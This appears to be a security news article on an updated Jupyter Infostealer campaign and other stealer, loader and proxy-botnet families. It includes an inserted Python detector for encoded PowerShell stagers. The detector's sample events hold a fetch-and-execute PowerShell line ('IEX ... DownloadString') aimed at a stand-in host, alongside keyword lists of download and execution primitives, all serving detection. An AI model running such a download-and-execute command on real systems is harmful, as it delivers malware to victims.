An updated version of an information stealer malware known as Jupyter has resurfaced with “simple yet impactful changes” that aim to stealthily establish a persistent foothold on compromised systems.
“The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately signed file,” VMware Carbon Black researchers said in a report shared with The Hacker News.
Jupyter Infostealer, also known as Polazert, SolarMarker, and Yellow Cockatoo, has a track record of leveraging manipulated search engine optimization (SEO) tactics and malvertising as an initial access vector to trick users searching for popular software into downloading it from dubious websites.
It comes with capabilities to harvest credentials as well as establish encrypted command-and-control (C2) communication to exfiltrate data and execute arbitrary commands.
The latest set of artifacts uses various certificates to sign the malware and lend it a veneer of legitimacy, only for the fake installers to activate the infection chain upon launch.
The installers are designed to invoke an interim payload that, in turn, employs PowerShell to connect to a remote server and ultimately decode and launch the stealer malware.
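The staging step above (a signed installer hands off to PowerShell, which reaches out to a remote server and then decodes and launches the payload) leaves a recognisable trace in process-creation telemetry. The following Python detector is an added example, not code from the report or from VMware Carbon Black: it takes simplified process-creation records (the field names ParentImage and CommandLine and the sample events are constructed for this illustration), unpacks any -EncodedCommand argument from its UTF-16LE base64 form, and only escalates to "suspicious" when the command line shows both a remote-fetch indicator and a decode/execute indicator, which is the combination the described chain requires.

```python
import base64
import binascii
import re

# Matches -EncodedCommand and the unambiguous prefixes PowerShell accepts for it
# (-e, -ec, -en, -enc, ...). The {20,} length floor keeps values of other
# switches such as "-ExecutionPolicy Unrestricted" from matching.
ENCODED_ARG = re.compile(r"(?i)\s-e(?:c|n\w*)?\s+([A-Za-z0-9+/=]{20,})")

# A stager has to (1) fetch something from a remote server and (2) decode or
# execute what it fetched. Each group is a tuple of case-insensitive regexes.
FETCH = (r"downloadstring", r"downloadfile", r"net\.webclient",
         r"invoke-webrequest", r"invoke-restmethod", r"https?://")
EXECUTE = (r"\biex\b", r"invoke-expression", r"frombase64string",
           r"start-process", r"add-type")


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except binascii.Error:
        return None  # malformed base64: nothing usable to decode
    # PowerShell expects the encoded script to be UTF-16LE.
    return raw.decode("utf-16-le", errors="replace")


def analyze(event):
    """Score one process-creation event and return the evidence with a verdict."""
    cmdline = event["CommandLine"]
    decoded = decode_encoded_command(cmdline)
    # Search the visible command line and the decoded script together.
    text = (cmdline + " " + (decoded or "")).lower()
    fetch = [p for p in FETCH if re.search(p, text)]
    execute = [p for p in EXECUTE if re.search(p, text)]
    hidden_window = re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmdline) is not None
    if fetch and execute:
        verdict = "suspicious"       # full fetch-then-run chain present
    elif decoded is not None or fetch or execute:
        verdict = "review"           # encoded or partial evidence: triage
    else:
        verdict = "benign"
    return {
        "parent": event.get("ParentImage"),
        "decoded": decoded,
        "fetch": fetch,
        "execute": execute,
        "hidden_window": hidden_window,
        "verdict": verdict,
    }


def encode_ps(script):
    """Build an -EncodedCommand argument the way PowerShell expects (UTF-16LE base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events (not taken from the report); field names are assumed.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -enc " + encode_ps("Get-Date")},
    {"ParentImage": r"C:\Users\user\Downloads\PopularApp-Setup.exe",
     "CommandLine": "powershell.exe -w hidden -ec " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://stage.example.invalid/p')")},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        result = analyze(ev)
        print(f"{result['verdict']:10s} parent={result['parent']} "
              f"fetch={result['fetch']} execute={result['execute']} "
              f"hidden={result['hidden_window']}")
```

The parent image is carried through in the result on purpose: a PowerShell process whose parent is a freshly downloaded installer rather than a shell or a scheduled task is exactly the relationship the report describes, and it is a useful pivot when triaging the "review" cases that an encoded but otherwise quiet command produces.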
The development comes as stealer malware offered for sale on the cybercrime underground continues to evolve with new tactics and techniques, effectively lowering the barrier to entry for lesser-skilled actors.
This includes an update to Lumma Stealer, which now incorporates a loader and the ability to randomly generate a build for improved obfuscation.
“This takes the malware from being a stealer type to a more devious malware that can load second-stage attacks on its victims,” VMware said. “The loader provides a way for the threat actor to escalate its attack from data theft to anything up to infecting its victims with ransomware.”
Another stealer malware family that has received steady improvements is Mystic Stealer, which has also added a loader functionality in recent versions to complement its information-stealing abilities.
“The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol,” Zscaler said in a report late last month.
“The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner.”
The constantly evolving nature of such malware is further exemplified by the emergence of stealers and remote access trojans such as Akira Stealer and Millenium RAT, which come fitted with various features to facilitate data theft.
The disclosure also arrives as malware loaders like PrivateLoader and Amadey have been observed infecting thousands of devices with a proxy botnet dubbed Socks5Systemz, which has been around since 2016.
Cybersecurity firm Bitsight, which revealed details of the service last week, said it identified at least 53 servers related to the botnet that are distributed across France, Bulgaria, the Netherlands, and Sweden.
The ultimate goal of the campaign is to turn infected machines into proxies capable of forwarding traffic for other actors, legitimate or otherwise, as an additional layer of anonymity. It’s suspected that the threat actors are of Russian origin, given the lack of infections in the country.
“The proxy service allows clients to choose a subscription ranging from $1 USD to $4,000 USD, payable in full using cryptocurrency,” Bitsight said. “Based on network telemetry analysis, it is estimated that this botnet has approximately 10,000 infected systems with victims spread across the globe.”